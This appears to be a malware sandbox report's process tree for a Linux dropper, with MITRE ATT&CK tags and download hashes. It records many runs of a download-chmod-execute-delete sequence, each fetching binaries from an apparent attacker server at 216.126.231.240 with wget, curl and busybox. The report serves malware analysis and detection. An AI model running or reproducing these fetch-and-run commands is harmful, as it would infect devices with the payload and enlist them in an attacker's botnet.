/usr/bin/wgetwget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:915
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:917
-
-
/bin/chmodchmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:920
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:921
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:923
-
-
/bin/chmodchmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:926
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:927
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:929
-
-
/bin/chmodchmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:932
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:933
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:935
-
-
/bin/chmodchmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:938
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:939
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:941
-
-
/bin/chmodchmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:944
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:945
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:947
-
-
/bin/chmodchmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:950
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:951
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:953
-
-
/bin/chmodchmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:955
-
-
/bin/rmrm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:956
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:957
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:959
-
-
/bin/chmodchmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:962
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:963
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:965
-
-
/bin/chmodchmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:968
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:969
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:971
-
-
/bin/chmodchmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:974
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97